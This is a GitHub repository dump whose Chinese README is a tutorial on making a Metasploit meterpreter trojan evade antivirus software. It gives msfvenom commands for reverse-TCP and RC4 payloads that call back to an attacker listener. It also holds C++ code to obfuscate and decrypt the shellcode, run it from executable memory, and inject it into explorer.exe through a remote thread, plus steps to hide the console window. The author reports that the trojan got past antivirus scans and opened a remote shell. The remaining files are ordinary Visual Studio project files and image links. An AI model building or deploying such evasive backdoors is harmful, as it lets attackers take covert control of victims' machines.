├── images
├── vs1.png
├── vs2.png
├── vs3.png
├── vs4.jpg
├── vs5.png
├── vs6.png
├── vs7.png
├── vs8.png
├── ser1.png
├── ser2.jpg
├── sharuan1.jpg
├── sharuan2.jpg
├── shell1.png
├── shell2.png
├── shell3.png
├── shell4.png
├── shell5.png
├── shell6.png
├── shell7.png
└── shell8.jpg
├── FunnyMeterpreter
├── main.cc
├── FunnyMeterpreter.vcxproj.filters
└── FunnyMeterpreter.vcxproj
├── FunnyMeterpreter.sln
├── .gitattributes
├── .gitignore
└── README.md
/images/vs1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs1.png
--------------------------------------------------------------------------------
/images/vs2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs2.png
--------------------------------------------------------------------------------
/images/vs3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs3.png
--------------------------------------------------------------------------------
/images/vs4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs4.jpg
--------------------------------------------------------------------------------
/images/vs5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs5.png
--------------------------------------------------------------------------------
/images/vs6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs6.png
--------------------------------------------------------------------------------
/images/vs7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs7.png
--------------------------------------------------------------------------------
/images/vs8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/vs8.png
--------------------------------------------------------------------------------
/images/ser1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/ser1.png
--------------------------------------------------------------------------------
/images/ser2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/ser2.jpg
--------------------------------------------------------------------------------
/images/sharuan1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/sharuan1.jpg
--------------------------------------------------------------------------------
/images/sharuan2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/sharuan2.jpg
--------------------------------------------------------------------------------
/images/shell1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell1.png
--------------------------------------------------------------------------------
/images/shell2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell2.png
--------------------------------------------------------------------------------
/images/shell3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell3.png
--------------------------------------------------------------------------------
/images/shell4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell4.png
--------------------------------------------------------------------------------
/images/shell5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell5.png
--------------------------------------------------------------------------------
/images/shell6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell6.png
--------------------------------------------------------------------------------
/images/shell7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell7.png
--------------------------------------------------------------------------------
/images/shell8.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/images/shell8.jpg
--------------------------------------------------------------------------------
/FunnyMeterpreter/main.cc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dothook/FunnyMeterpreter/HEAD/FunnyMeterpreter/main.cc
--------------------------------------------------------------------------------
/FunnyMeterpreter/FunnyMeterpreter.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
--------------------------------------------------------------------------------
/FunnyMeterpreter.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28010.2048
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunnyMeterpreter", "FunnyMeterpreter\FunnyMeterpreter.vcxproj", "{ED696FB8-16A7-4171-9108-28166B74B403}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x64.ActiveCfg = Debug|x64
17 | {ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x64.Build.0 = Debug|x64
18 | {ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x86.ActiveCfg = Debug|Win32
19 | {ED696FB8-16A7-4171-9108-28166B74B403}.Debug|x86.Build.0 = Debug|Win32
20 | {ED696FB8-16A7-4171-9108-28166B74B403}.Release|x64.ActiveCfg = Release|x64
21 | {ED696FB8-16A7-4171-9108-28166B74B403}.Release|x64.Build.0 = Release|x64
22 | {ED696FB8-16A7-4171-9108-28166B74B403}.Release|x86.ActiveCfg = Release|Win32
23 | {ED696FB8-16A7-4171-9108-28166B74B403}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {0995D11B-803A-4319-847B-A07B47D003DA}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | bld/
21 | [Bb]in/
22 | [Oo]bj/
23 | [Ll]og/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | project.fragment.lock.json
46 | artifacts/
47 |
48 | *_i.c
49 | *_p.c
50 | *_i.h
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.tmp_proj
65 | *.log
66 | *.vspscc
67 | *.vssscc
68 | .builds
69 | *.pidb
70 | *.svclog
71 | *.scc
72 |
73 | # Chutzpah Test files
74 | _Chutzpah*
75 |
76 | # Visual C++ cache files
77 | ipch/
78 | *.aps
79 | *.ncb
80 | *.opendb
81 | *.opensdf
82 | *.sdf
83 | *.cachefile
84 | *.VC.db
85 | *.VC.VC.opendb
86 |
87 | # Visual Studio profiler
88 | *.psess
89 | *.vsp
90 | *.vspx
91 | *.sap
92 |
93 | # TFS 2012 Local Workspace
94 | $tf/
95 |
96 | # Guidance Automation Toolkit
97 | *.gpState
98 |
99 | # ReSharper is a .NET coding add-in
100 | _ReSharper*/
101 | *.[Rr]e[Ss]harper
102 | *.DotSettings.user
103 |
104 | # JustCode is a .NET coding add-in
105 | .JustCode
106 |
107 | # TeamCity is a build add-in
108 | _TeamCity*
109 |
110 | # DotCover is a Code Coverage Tool
111 | *.dotCover
112 |
113 | # NCrunch
114 | _NCrunch_*
115 | .*crunch*.local.xml
116 | nCrunchTemp_*
117 |
118 | # MightyMoose
119 | *.mm.*
120 | AutoTest.Net/
121 |
122 | # Web workbench (sass)
123 | .sass-cache/
124 |
125 | # Installshield output folder
126 | [Ee]xpress/
127 |
128 | # DocProject is a documentation generator add-in
129 | DocProject/buildhelp/
130 | DocProject/Help/*.HxT
131 | DocProject/Help/*.HxC
132 | DocProject/Help/*.hhc
133 | DocProject/Help/*.hhk
134 | DocProject/Help/*.hhp
135 | DocProject/Help/Html2
136 | DocProject/Help/html
137 |
138 | # Click-Once directory
139 | publish/
140 |
141 | # Publish Web Output
142 | *.[Pp]ublish.xml
143 | *.azurePubxml
144 | # TODO: Comment the next line if you want to checkin your web deploy settings
145 | # but database connection strings (with potential passwords) will be unencrypted
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
150 | # checkin your Azure Web App publish settings, but sensitive information contained
151 | # in these scripts will be unencrypted
152 | PublishScripts/
153 |
154 | # NuGet Packages
155 | *.nupkg
156 | # The packages folder can be ignored because of Package Restore
157 | **/packages/*
158 | # except build/, which is used as an MSBuild target.
159 | !**/packages/build/
160 | # Uncomment if necessary however generally it will be regenerated when needed
161 | #!**/packages/repositories.config
162 | # NuGet v3's project.json files produces more ignoreable files
163 | *.nuget.props
164 | *.nuget.targets
165 |
166 | # Microsoft Azure Build Output
167 | csx/
168 | *.build.csdef
169 |
170 | # Microsoft Azure Emulator
171 | ecf/
172 | rcf/
173 |
174 | # Windows Store app package directories and files
175 | AppPackages/
176 | BundleArtifacts/
177 | Package.StoreAssociation.xml
178 | _pkginfo.txt
179 |
180 | # Visual Studio cache files
181 | # files ending in .cache can be ignored
182 | *.[Cc]ache
183 | # but keep track of directories ending in .cache
184 | !*.[Cc]ache/
185 |
186 | # Others
187 | ClientBin/
188 | ~$*
189 | *~
190 | *.dbmdl
191 | *.dbproj.schemaview
192 | *.jfm
193 | *.pfx
194 | *.publishsettings
195 | node_modules/
196 | orleans.codegen.cs
197 |
198 | # Since there are multiple workflows, uncomment next line to ignore bower_components
199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
200 | #bower_components/
201 |
202 | # RIA/Silverlight projects
203 | Generated_Code/
204 |
205 | # Backup & report files from converting an old project file
206 | # to a newer Visual Studio version. Backup files are not needed,
207 | # because we have git ;-)
208 | _UpgradeReport_Files/
209 | Backup*/
210 | UpgradeLog*.XML
211 | UpgradeLog*.htm
212 |
213 | # SQL Server files
214 | *.mdf
215 | *.ldf
216 |
217 | # Business Intelligence projects
218 | *.rdl.data
219 | *.bim.layout
220 | *.bim_*.settings
221 |
222 | # Microsoft Fakes
223 | FakesAssemblies/
224 |
225 | # GhostDoc plugin setting file
226 | *.GhostDoc.xml
227 |
228 | # Node.js Tools for Visual Studio
229 | .ntvs_analysis.dat
230 |
231 | # Visual Studio 6 build log
232 | *.plg
233 |
234 | # Visual Studio 6 workspace options file
235 | *.opt
236 |
237 | # Visual Studio LightSwitch build output
238 | **/*.HTMLClient/GeneratedArtifacts
239 | **/*.DesktopClient/GeneratedArtifacts
240 | **/*.DesktopClient/ModelManifest.xml
241 | **/*.Server/GeneratedArtifacts
242 | **/*.Server/ModelManifest.xml
243 | _Pvt_Extensions
244 |
245 | # Paket dependency manager
246 | .paket/paket.exe
247 | paket-files/
248 |
249 | # FAKE - F# Make
250 | .fake/
251 |
252 | # JetBrains Rider
253 | .idea/
254 | *.sln.iml
255 |
256 | # CodeRush
257 | .cr/
258 |
259 | # Python Tools for Visual Studio (PTVS)
260 | __pycache__/
261 | *.pyc
--------------------------------------------------------------------------------
/FunnyMeterpreter/FunnyMeterpreter.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 15.0
23 | {ED696FB8-16A7-4171-9108-28166B74B403}
24 | FunnyMeterpreter
25 | 10.0.17134.0
26 |
27 |
28 |
29 | Application
30 | true
31 | v141
32 | MultiByte
33 |
34 |
35 | Application
36 | false
37 | v141
38 | true
39 | MultiByte
40 |
41 |
42 | Application
43 | true
44 | v141
45 | MultiByte
46 |
47 |
48 | Application
49 | false
50 | v141
51 | true
52 | MultiByte
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | Disabled
77 | true
78 | true
79 |
80 |
81 |
82 |
83 | Level3
84 | Disabled
85 | true
86 | true
87 |
88 |
89 |
90 |
91 | Level3
92 | MaxSpeed
93 | true
94 | true
95 | true
96 | true
97 |
98 |
99 | true
100 | true
101 |
102 |
103 |
104 |
105 | Level3
106 | MaxSpeed
107 | true
108 | true
109 | true
110 | true
111 |
112 |
113 | true
114 | true
115 | Windows
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 与反病毒软件老大哥们的打闹日常
2 | 如果觉得对你有启发, 方便点亮个 `star` 呗。
3 | ## 前言
4 | 临近毕业,前不久去面试与帅气的面试官聊到了免杀,我答内核钩子、应用层勾子和自建API函数...
5 |
6 | ## 环境准备
7 | 1. Vmware Workstation Pro 15
8 | 2. Windows 10
9 | 3. Windows Server 2008 R2
10 | 4. Visual studio 2017 (C++ 开发环境)
11 | 5. Ubuntu 18.04.1 LTS
12 | 6. Metasploit
13 |
14 | ## 打闹开始
15 | ### 生成普通的 Windows x64 meterpreter
16 | ```shell
17 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=8844 -f exe -o hack.exe
18 | ```
19 | 
20 |
21 | 这是生成 `meterpreter` 木马最简单的方法,可以预见这种直接生成的木马是肯定会被杀软无情的按在地上摩擦的。
22 | 
23 |
24 | ### 生成 meterpreter shellcode
25 | ```shell
26 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=8844 -f c
27 | ```
28 | 
29 |
30 | ### Visual studio 2017 新建项目
31 | 1. 项目类型选择 Visual C++ 空项目
32 | 2. 项目名称我们命名为 `meterpreter`
33 |
34 | 
35 |
36 | ### SHELLCODE 处理
37 | 想要不被杀软拦截,重点就在修改shellcode上。反病毒软件通过二进制特征码,判断可执行文件是否为病毒文件。我们生成的 meterpreter shellcode 不用思考,肯定是在杀软的病毒特征码仓库的。
38 |
39 | #### encry_shellcode 函数
40 | 这里我们自己写一个函数,先对我们刚刚生成的 `shellcode` 进行简单的处理。
41 | ```cpp
42 | #include
43 | #include
44 |
45 | void encrypt_shellcode(unsigned char* shellcode, size_t size) {
46 | // 简单加密
47 | for (size_t i = 0; i < size - 1; i++) {
48 | if (shellcode[i] == 0x00) {
49 | shellcode[i] += 0x05;
50 | } else {
51 | if ((shellcode[i] - 0x01) != 0x05) {
52 | shellcode[i] -= 0x01;
53 | }
54 | }
55 | }
56 | // 循环输出
57 | for (size_t i = 0; i < size - 1; i++) {
58 | std::cout << std::hex << "\\x"
59 | << std::setfill('0')
60 | << std::setw(2)
61 | << (unsigned int)(byte)shellcode[i];
62 | }
63 | std::cout << std::endl;
64 | }
65 |
66 | int main() {
67 | unsigned char shellcode[] = "...";
68 | encrypt_shellcode(shellcode, sizeof(shellcode));
69 | system("pause");
70 | return 0;
71 | }
72 | ```
73 | `encrypt_shellcode` 函数对shellcode进行了一个简单的加密。
74 | 1. 遍历shellcode每一个字符除了末尾的 `\0`
75 | 2. 如果当前字符等于 `0x00` 我们将当前字符加上 `0x05`
76 | 3. 其他不等于 `0x00` 的字符,当它减 `0x01` 不等于 `0x05` 时, 我们将它减去 `0x01`
77 | 4. 遍历输出
78 |
79 | 
80 |
81 | #### decrypt_shellcode 函数
82 | ```cpp
83 | // 解密shellcode函数
84 | void decrypt_shellcode(unsigned char* shellcode, size_t size) {
85 | // 解密shellcode
86 | for (size_t i = 0; i < size - 1 /*最后一位为\0所以无需解密*/; i++) {
87 | if (shellcode[i] == 0x05) {
88 | shellcode[i] = 0x00;
89 | } else {
90 | shellcode[i] += 0x01;
91 | }
92 | }
93 | }
94 | ```
95 | 解密函数不难理解,就是加密的反操作
96 |
97 | ### 执行shellcode
98 | 我们加密shellcode主要是为了逃避杀软的特征码搜索,但是经过处理的shellcode,肯定是无法执行的,所以我们编写了解密shellcode的函数 `decrypt_shellcode`,这样我们就可以带着处理过的shellcode,想要执行的时候只需解密就可以正常执行了。
99 | ```cpp
100 | int main() {
101 | unsigned char shellcode[] ="..."; // 经过处理的shellcode
102 | // 解密shellcode
103 | decrypt_shellcode(shellcode, sizeof(shellcode));
104 | typedef void(__cdecl * Func)();
105 | void* p = ::VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE,
106 | PAGE_EXECUTE_READWRITE);
107 | // copy shellcode to p
108 | memcpy(p, shellcode, sizeof(shellcode));
109 | Func code = (Func)p;
110 | code();
111 | system("pause");
112 | return 0;
113 | }
114 | ```
115 | 执行shellcode的方法有很多,我这里只是其中的一种,有兴趣可以问问度娘其他的方法。这里我们切换为Release x64版本编译项目。
116 |
117 | 
118 |
119 | 使用杀软扫描我们编译的程序。
120 | 
121 |
122 | 现在我们设起监听,执行编译好的马,是可以成功反弹shell的,你可以试试,不过咱们的马还是存在一些小瑕疵的,[滑稽]。
123 |
124 | ### 将shellcode注入其他程序执行
125 | shellcode注入是我突发奇想想出来的,其实不注入直接执行也可以。
126 | ```cpp
127 | #include
128 | #include
129 | #include
130 | #include
131 | #include
132 |
133 | // 根据进程名搜索PID
134 | // 根据进程名搜索PID
135 | const unsigned int get_pid(std::string process_name) {
136 | PROCESSENTRY32 pe32;
137 | HANDLE hProcSnap = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
138 | if (hProcSnap == INVALID_HANDLE_VALUE) {
139 | return 0;
140 | }
141 | pe32.dwSize = sizeof(PROCESSENTRY32);
142 | // 遍历进程
143 | for (BOOL ret = Process32First(hProcSnap, &pe32); ret;
144 | ret = Process32Next(hProcSnap, &pe32)) {
145 | if (process_name == pe32.szExeFile) {
146 | CloseHandle(hProcSnap);
147 | return pe32.th32ProcessID;
148 | }
149 | }
150 | CloseHandle(hProcSnap);
151 | return 0;
152 | }
153 |
154 | // 注入函数
155 | bool inject_shellcode(const unsigned int pid, unsigned char* shellcode,
156 | size_t size) {
157 | // 解密shellcode
158 | decrypt_shellcode(shellcode, size);
159 | HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
160 | // 获取进程句柄失败
161 | if (hProcess == INVALID_HANDLE_VALUE) return false;
162 | auto inject_address =
163 | ::VirtualAllocEx(hProcess, NULL, sizeof(1000), MEM_COMMIT | MEM_RESERVE,
164 | PAGE_EXECUTE_READWRITE);
165 | // VirtualAllocEx 失败
166 | if (inject_address == NULL) return false;
167 | // 远程写入shellcode
168 | ::WriteProcessMemory(hProcess, inject_address, (PVOID)shellcode, size + 1,
169 | NULL);
170 | HANDLE hThread = ::CreateRemoteThread(
171 | hProcess, 0, 0, (LPTHREAD_START_ROUTINE)inject_address, NULL, 0, NULL);
172 | ::WaitForSingleObject(hThread, INFINITE);
173 | ::CloseHandle(hThread);
174 | ::VirtualFreeEx(hProcess, inject_address, 0, MEM_RELEASE);
175 | ::CloseHandle(hProcess);
176 | return true;
177 | }
178 | ```
179 | 注入函数是很经典的远程线程注入,看不懂没关系,shellcode注入不是重点。
180 |
181 | ### 去除命令提示符窗口
182 | 如果你运行过我们生成的木马你会发现,一个醒目的黑窗口,亮瞎了你的双目。
183 | 现在我们去除命令提示符的黑窗口,隐秘执行我们的木马。
184 |
185 | 我们修改程序生成 `SUBSYSTEM:WINDOWS` 窗口类程序,并将入口函数修改为WinMain就可以不带命令行提示符运行程序了。
186 | 
187 | ```cpp
188 | int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance,
189 | _In_ LPSTR lpCmdLine, _In_ int nShowCmd) {
190 | unsigned char shellcode[] = "..."; // 加密后的
191 |
192 | const unsigned int explorer_pid = get_pid("explorer.exe");
193 | // 注入函数内部自解密shellcode
194 | inject_shellcode(explorer_pid, shellcode, sizeof(shellcode));
195 |
196 | return 0;
197 | }
198 | ```
199 | 有过 Windows编程经验的大佬肯定了解, 这里我们写了`WinMain` 函数就可以删除`main`函数了。
200 |
201 | 这里我使用shellcode远程注入 `explorer.exe` 进程来执行我们的木马。你也可以使用我们之前的方法。
202 |
203 | ### 生成rc4加密通讯的 meterpreter shellcode
204 | ```shell
205 | msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=192.168.1.3 LPORT=8844 RC4PASSWORD=ncvt -f c
206 | ```
207 | 
208 |
209 | 在找资料的时候发现,好像使用rc4加密通讯的话可以反之杀软动态拦截,管他呢,其实也就换一下shellcode,我们把新的shellcode使用 `encry_shellcode` 函数加密一下就可以了。
210 |
211 | ### Ubuntu 18.04 启动 meterpreter 监听
212 | 参数就下面这些 payload 使用的 `windows/x64/meterpreter/reverse_tcp_rc4`
213 | 记得设置 `RC4PASSWORD`
214 | 
215 |
216 | 好的我们启用监听 `exploit`。
217 |
218 | ### Windows Server 2008 R2 运行木马
219 | 我们换到 `Windows Server 2008` 中运行我们编译的木马,杀软也换一个。
220 | 
221 |
222 | 将木马丢进虚拟机,使用杀软扫描一下。
223 | 
224 |
225 | 执行木马,并未拦截,我们切回 `Ubuntu 18.04`
226 | 
227 |
228 | 成功反弹了meterpreter shell。
229 | 
230 |
231 | 截一张图
232 |
233 | 
234 | 
235 |
236 | ## 试验总结
237 | 玩了那么久的的是Web安全,第一次写文章居然是写免杀,挺不可思议的,研究了小半个下午,各位看官老爷可以看出,我写的处理shellcode方法挺拙劣的,哈哈!
238 | 免杀的学问可不止这一点点,与老大哥们的小打小闹先到这,毕竟人生不应该把精力放在这些小打小闹的垃圾玩意身上,小弟撸代码去了~
239 |
240 | ## 源码
241 | 记得重新生成解决方案
242 | GitHub: https://github.com/dothook/ZiYuanFenXiang 大佬给个 `Star` 呗。
243 | ```shell
244 | git clone https://github.com/dothook/FunnyMeterpreter.git
245 | ```
246 | 
247 |
248 | ## 附加
249 | 非常重要!!!
250 | 因为可能需要使用Windows相关DLL接口,一定要使用 `MT模式`生成代码,这样就可以静态链接程序,无需依赖一些VC库了。
251 |
252 | 
--------------------------------------------------------------------------------